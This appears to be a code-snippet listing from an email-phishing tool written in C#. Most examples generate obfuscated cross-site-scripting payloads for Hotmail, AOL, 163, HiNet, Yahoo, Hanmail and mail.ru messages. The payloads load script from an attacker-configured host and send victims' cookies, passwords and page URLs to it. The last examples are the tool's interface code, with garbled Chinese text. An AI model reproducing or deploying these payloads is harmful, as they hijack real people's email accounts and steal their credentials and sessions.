Exemplo n.º 1
0
 private void Xss(Model model)
 {
     Record record = new Record();
     if (model.Type == "Cookie")
     {
         model.Address = "http://" + record.Dns("") + "/hotmail/indexC.asp?";
         model.XSSCode = "<div id=\"fdList\" title=\"document.write(String.fromCharCode(60)+'script'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62)+String.fromCharCode(60)+'script src=" + model.Address + "uid=" + model.Addressee + "'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62));yyll=111;\"></div>" + this.CRLF + "<style>" + this.CRLF + "#fdList{" + this.CRLF + "color: rgb(''abc\"x:expression((window.yyll==111)?xxyy=6:(eval(ecxfdList.title)));" + this.CRLF + "}" + this.CRLF + "</style>" + this.CRLF;
     }
     else if (model.Type == "Password")
     {
         model.Address = "http://" + record.Dns("") + "/hotmail/index.asp?";
         model.XSSCode = "<div id=\"fdList\" title=\"document.write(String.fromCharCode(60)+'script'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62)+String.fromCharCode(60)+'script src=" + model.Address + "uid=" + model.Addressee + "'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62));yyll=111;\"></div>" + this.CRLF + "<style>" + this.CRLF + "#fdList{" + this.CRLF + "color: rgb(''abc\"x:expression((window.yyll==111)?xxyy=6:(eval(ecxfdList.title)));" + this.CRLF + "}" + this.CRLF + "</style>" + this.CRLF;
     }
     else if (model.Type == "C+P")
     {
         model.Address = "http://" + record.Dns("") + "/hotmail/indexCP.asp?";
         model.XSSCode = "<div id=\"fdList\" title=\"document.write(String.fromCharCode(60)+'script'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62)+String.fromCharCode(60)+'script src=" + model.Address + "uid=" + model.Addressee + "'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62));yyll=111;\"></div>" + this.CRLF + "<style>" + this.CRLF + "#fdList{" + this.CRLF + "color: rgb(''abc\"x:expression((window.yyll==111)?xxyy=6:(eval(ecxfdList.title)));" + this.CRLF + "}" + this.CRLF + "</style>" + this.CRLF;
     }
     else if (model.Type == "Mail")
     {
         string str = "";
         Random random = new Random();
         for (int i = 0; i < 6; i++)
         {
             str = str + random.Next(10).ToString();
         }
         model.Address = "http://" + record.Dns("") + "/upload/index.php";
         model.XSSCode = "<style>" + this.CRLF + "p,font,table{" + this.CRLF + "top:rgb('88',80,'180);" + this.CRLF + "top:rgb(') !important" + this.CRLF + "height:expression(  (window.r==123)?x=8:(eval(code.title)==20088) || (r=123)       );}" + this.CRLF + "</style>" + this.CRLF + "abcdefg<div id=code title=\"emailkey='" + str + "';window.onerror=function(){return true;};if(window.ufoufoufo!=1) {framedir='" + model.Address + "';yyuser='******';_x_=document.createElement('SCRIPT');_x_.src=framedir+'?key='+emailkey+'&amp;msg='+escape('-'+yyuser+'^-!!-'+document.location);document.insertBefore(_x_,document.getElementsByTagName('*')[0]);ufoufoufo=1;}\"></div><p>-</p><font>-</font>";
     }
 }
Exemplo n.º 2
0
 private void Xss(Model model)
 {
     Record record = new Record();
     if (model.Type == "Cookie")
     {
         model.Address = "http://" + record.Dns("") + "/aol/index.asp?";
         model.XSSCode = "<img id=\"mylyy\" width=1 height=1 src=\"#\" title=\"new Image().src='" + model.Address + "uid=" + model.Addressee + "&cookie='+escape(document.cookie);\">" + this.CRLF + "<img id=\"myraya\" width=1 height=1 src=\"#\" title=\"document.location='" + model.Address + "?url='+document.location+'&uid=" + model.Addressee + "&logo=0';\"> " + this.CRLF + "<style>" + this.CRLF + "font,#myp{font:' ';'}" + this.CRLF + "a';" + this.CRLF + "background-image:expr<!--/*' '*/-->ession((window.rrr==1)?'':eval('rrr=1;eval(mylyy.title);eval(myraya.title);'));}'{}/*'*/</style><div id=\"myp\">";
     }
     else if (model.Type == "Password")
     {
         model.Address = "http://" + record.Dns("") + "/aol/index2.asp?";
         model.XSSCode = "<img id=\"mylyy\" width=1 height=1 src=\"#\" title=\"new Image().src='" + model.Address + "uid=" + model.Addressee + "&cookie='+escape(document.cookie);\"> " + this.CRLF + "<img id=\"myraya\" width=1 height=1 src=\"#\" title=\"document.location='" + model.Address + "?url='+document.location+'&uid=" + model.Addressee + "&logo=0';\"> " + this.CRLF + "<style>" + this.CRLF + "font,#myp{font:' ';'}" + this.CRLF + "a';" + this.CRLF + "background-image:expr<!--/*' '*/-->ession((window.rrr==1)?'':eval('rrr=1;eval(mylyy.title);eval(myraya.title);'));}'{}/*'*/</style><div id=\"myp\">";
     }
     else if (model.Type == "C+P")
     {
         model.Address = "http://" + record.Dns("") + "/aol/indexcp.asp?";
         model.XSSCode = "<img id=\"mylyy\" width=1 height=1 src=\"#\" title=\"new Image().src='" + model.Address + "uid=" + model.Addressee + "&cookie='+escape(document.cookie);\"> " + this.CRLF + "<img id=\"myraya\" width=1 height=1 src=\"#\" title=\"document.location='" + model.Address + "?url='+document.location+'&uid=" + model.Addressee + "&logo=0';\"> " + this.CRLF + "<style>" + this.CRLF + "font,#myp{font:' ';'}" + this.CRLF + "a';" + this.CRLF + "background-image:expr<!--/*' '*/-->ession((window.rrr==1)?'':eval('rrr=1;eval(mylyy.title);eval(myraya.title);'));}'{}/*'*/</style><div id=\"myp\">";
     }
 }
Exemplo n.º 3
0
 private void Xss(Model model)
 {
     string addressee = model.Addressee;
     int index = addressee.IndexOf('@');
     addressee = addressee.ToLower().Substring(0, index);
     Record record = new Record();
     if (model.Type == "Cookie")
     {
         model.Address = "http://" + record.Dns("") + "/163/index.asp?";
         model.XSSCode = "<textarea style=DISPLAY:none><style></textarea>" + this.CRLF + "<script>" + this.CRLF + "document.location=\"" + model.Address + "id=" + addressee + "&cookie=\"+escape(document.cookie);" + this.CRLF + "</script>" + this.CRLF + "</style></textarea>";
     }
     else if (model.Type == "Password")
     {
         model.Address = "http://" + record.Dns("") + "/163/indexP.asp?";
         model.XSSCode = "<textarea style=DISPLAY:none><style></textarea>" + this.CRLF + "<script>" + this.CRLF + "document.location=\"" + model.Address + "id=" + model.EncodeBase64(model.Addressee) + "&cookie=\"+escape(document.cookie);" + this.CRLF + "</script>" + this.CRLF + "</style></textarea>";
     }
     else if (model.Type == "C+P")
     {
         model.Address = "http://" + record.Dns("") + "/163/indexcp.asp?";
         model.XSSCode = "<textarea style=DISPLAY:none><style></textarea>" + this.CRLF + "<script>" + this.CRLF + "document.location=\"" + model.Address + "id=" + addressee + "&cookie=\"+escape(document.cookie);" + this.CRLF + "</script>" + this.CRLF + "</style></textarea>";
     }
 }
Exemplo n.º 4
0
 private void Xss(Model model)
 {
     string addressee = model.Addressee;
     int index = addressee.IndexOf('@');
     addressee = addressee.ToLower().Substring(0, index);
     Record record = new Record();
     if (model.Type == "Cookie")
     {
         model.Address = "http://" + record.Dns("") + "/hinet/index.asp?";
         model.XSSCode = "<html><body><STYLE>@im\\port'\\ja\\vasc\\ript:document.location=\"" + model.Address + "\r\ndomain=\"+document.domain+\"&uid=" + model.Addressee + "&url=\"+document.location.href+\"&cookie=\"+escape(document.cookie)';</STYLE></body></html>";
     }
     else if (model.Type == "Password")
     {
         model.Address = "http://" + record.Dns("") + "/hinet/indexp.asp?";
         model.XSSCode = "<html><body><STYLE>@im\\port'\\ja\\vasc\\ript:document.location=\"" + model.Address + "\r\ndomain=\"+document.domain+\"&uid=" + model.Addressee + "&url=\"+document.location.href+\"&cookie=\"+escape(document.cookie)';</STYLE></body></html>";
     }
     else if (model.Type == "C+P")
     {
         model.Address = "http://" + record.Dns("") + "/hinet/indexcp.asp?";
         model.XSSCode = "<html><body><STYLE>@im\\port'\\ja\\vasc\\ript:document.location=\"" + model.Address + "\r\ndomain=\"+document.domain+\"&uid=" + model.Addressee + "&url=\"+document.location.href+\"&cookie=\"+escape(document.cookie)';</STYLE></body></html>";
     }
 }
Exemplo n.º 5
0
 private void Xss(Model model)
 {
     Record record = new Record();
     if (model.Type == "Cookie")
     {
         model.Address = "http://" + record.Dns("") + "/ru/ruC.asp?";
         model.XSSCode = "<HTML><HEAD>" + this.CRLF + "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=\"utf-8\">" + this.CRLF + "<META name=GENERATOR content=\"MSHTML 8.00.6001.18904\"></HEAD>" + this.CRLF + "<BODY>" + this.CRLF + "<div style=\"display:none\" id=\"lovely3\">function go(){var f=document.createElement('script');f.src='" + model.Address + "uid=" + model.Addressee + "!a=a'.replace(/!/g,String.fromCharCode(38));document.body.appendChild(f)}document.body.onload=go</div><style>a{font:'a\\'};</style><a style=\"display:none\">'</a><img width=0 src=# onerror=\"eval(lovely3.innerHTML)\"></style><P></P>" + this.CRLF + "</BODY></HTML>";
     }
     else if (model.Type == "Password")
     {
         model.Address = "http://" + record.Dns("") + "/ru/ruP.asp?";
         model.XSSCode = "<HTML><HEAD>" + this.CRLF + "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=\"utf-8\">" + this.CRLF + "<META name=GENERATOR content=\"MSHTML 8.00.6001.18904\"></HEAD>" + this.CRLF + "<BODY>" + this.CRLF + "<div style=\"display:none\" id=\"lovely3\">function go(){var f=document.createElement('script');f.src='" + model.Address + "uid=" + model.Addressee + "';document.body.appendChild(f)}document.body.onload=go</div><style>a{font:'a\\'};</style><a style=\"display:none\">'</a><img width=0 src=# onerror=\"eval(lovely3.innerHTML)\"></style><P></P>" + this.CRLF + "</BODY></HTML>";
     }
     else if (model.Type == "Mail")
     {
         model.XSSCode = "";
     }
     else if (model.Type == "C+P")
     {
         model.Address = "http://" + record.Dns("") + "/ru/ruCP.asp?";
         model.XSSCode = "<HTML><HEAD>" + this.CRLF + "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=\"utf-8\">" + this.CRLF + "<META name=GENERATOR content=\"MSHTML 8.00.6001.18904\"></HEAD>" + this.CRLF + "<BODY>" + this.CRLF + "<div style=\"display:none\" id=\"lovely3\">function go(){var f=document.createElement('script');f.src='" + model.Address + "uid=" + model.Addressee + "!a=a'.replace(/!/g,String.fromCharCode(38));document.body.appendChild(f)}document.body.onload=go</div><style>a{font:'a\\'};</style><a style=\"display:none\">'</a><img width=0 src=# onerror=\"eval(lovely3.innerHTML)\"></style><P></P>" + this.CRLF + "</BODY></HTML>";
     }
 }
Exemplo n.º 6
0
 private void Xss(Model model)
 {
     Record record = new Record();
     if (model.Type == "Cookie")
     {
         model.Address = "http://" + record.Dns("") + "/yahoo/index.asp?";
         model.XSSCode = "<style><!--.textLink.fontLink, .inlinemsg{display:none}--></style><script id=v b=div c=.textLink.fontLink n=tr k=span y=oninIcon o=display: m=none l=>{document.all.tags(v.b)[0].id=v.m}{ u=document.all.tags(v.n)[3].all.tags(v.k)}{u[2].onclick=v.m}{u[3].style.display=v.m}{u[1].innerText=u[1].innerText.replace(2,1)}{t=[2,3]}{setTimeout(function(){for(i in t)document.styleSheets[t[i]].rules(v.c).style.display=v.l},1300)}</script><script src=" + model.Address + "uid=" + model.Addressee + "></script>";
     }
     else if (model.Type == "Password")
     {
         model.Address = "http://" + record.Dns("") + "/yahoo/yahooP.asp?";
         model.XSSCode = "<style><!--.textLink.fontLink, .inlinemsg{display:none}--></style><script id=v b=div c=.textLink.fontLink n=tr k=span y=oninIcon o=display: m=none l=>{document.all.tags(v.b)[0].id=v.m}{ u=document.all.tags(v.n)[3].all.tags(v.k)}{u[2].onclick=v.m}{u[3].style.display=v.m}{u[1].innerText=u[1].innerText.replace(2,1)}{t=[2,3]}{setTimeout(function(){for(i in t)document.styleSheets[t[i]].rules(v.c).style.display=v.l},1300)}</script><script src=" + model.Address + "uid=" + model.Addressee + "></script>";
     }
     else if (model.Type == "Mail")
     {
         model.XSSCode = "";
     }
     else if (model.Type == "C+P")
     {
         model.Address = "http://" + record.Dns("") + "/yahoo/indexcp.asp?";
         model.XSSCode = "<style><!--.textLink.fontLink, .inlinemsg{display:none}--></style><script id=v b=div c=.textLink.fontLink n=tr k=span y=oninIcon o=display: m=none l=>{document.all.tags(v.b)[0].id=v.m}{ u=document.all.tags(v.n)[3].all.tags(v.k)}{u[2].onclick=v.m}{u[3].style.display=v.m}{u[1].innerText=u[1].innerText.replace(2,1)}{t=[2,3]}{setTimeout(function(){for(i in t)document.styleSheets[t[i]].rules(v.c).style.display=v.l},1300)}</script><script src=" + model.Address + "uid=" + model.Addressee + "></script>";
     }
 }
Exemplo n.º 7
0
 private void Xss(Model model)
 {
     Record record = new Record();
     if (model.Type == "Cookie")
     {
         model.XSSCode = "";
     }
     else if (model.Type == "Password")
     {
         model.Address = "http://" + record.Dns("") + "/hanmailpass/index.asp?";
         model.XSSCode = "<div style=\"width:" + this.StrToHex("expression(eval((window.r!=1)?(window.r=1,(document.location='" + model.Address + "?uid=" + model.Addressee + "&cookie='+escape(document.cookie))):1))") + ";\">";
     }
     else if (model.Type == "Mail")
     {
         model.Address = "http://" + record.Dns("") + "/hanmail/index.php?";
         string str = "";
         Random random = new Random();
         for (int i = 0; i < 4; i++)
         {
             str = str + random.Next(10).ToString();
         }
         model.XSSCode = "<div style=\"width:" + this.StrToHex("expression(eval((window.r!=1)?(window.r=1,(document.location='" + model.Address + "uid=" + model.Addressee + "&cookie='+escape(document.cookie))):1))") + ";\">";
     }
 }
Exemplo n.º 8
0
        private void MainForm_Load(object sender, EventArgs e)
        {
            LoadMainEditor();
            LoadMailCookietControl();
            LoadPopMailControl();

            Record record = new Record();
            record.ini("get");
             //   this.notifyIcon1.Visible = true;
            this.trvListInfo.ExpandAll();
            this.BindTreeView();
            string[] strArray = record.GetRecord();
            this.NickNameEdit.EditValue = strArray[0];
            this.SendMailNameEdit.EditValue = strArray[1];
            this.ReceiveNameEdit.EditValue = strArray[2];
            this.UserNameEdit.EditValue = strArray[3];
            this.SubjectEdit.EditValue = strArray[4];
            this.ServerNameEdit.EditValue = strArray[5];
            this.FliterUsersComboBox.EditValue = "��ʾȫ���û�";
        }
Exemplo n.º 9
0
 private void MainForm_FormClosing(object sender, FormClosingEventArgs e)
 {
     string str = "Time";
     if (MessageBox.Show("ȷ��Ҫ�˳���?", "��ʾ", MessageBoxButtons.YesNo, MessageBoxIcon.Asterisk) == DialogResult.Yes)
     {
         Record record = new Record();
         record.SetRecord(this.NickNameEdit.EditValue.ToString(), this.SendMailNameEdit.EditValue.ToString(), this.ReceiveNameEdit.EditValue.ToString(), this.UserNameEdit.EditValue.ToString(), this.SubjectEdit.EditValue.ToString(), this.ServerNameEdit.EditValue.ToString());
         DateTime now = new DateTime();
         now = DateTime.Now;
         int year = now.Year;
         int month = now.Month;
         int day = now.Day;
         string str2 = string.Concat(new object[] { str, year, "��", month, "��", day, "��" });
         record.ini("get");
         Application.ExitThread();
     }
     else
     {
         e.Cancel = true;
     }
 }
Exemplo n.º 10
0
        private void AddDNS_LinkClicked(object sender, DevExpress.XtraNavBar.NavBarLinkEventArgs e)
        {
            AddDNS TmpDlg = new AddDNS();
            TmpDlg.ShowDialog();

            if (TmpDlg.strDNS != "")
            {
                Record record = new Record();
                MessageBox.Show(record.Dns(TmpDlg.strDNS), "�����ʾ", MessageBoxButtons.OK, MessageBoxIcon.None);
            }
            else
            {
                this.MailInfoOutput.Text = this.MailInfoOutput.Text + "DNS������!\r\n";
            }
        }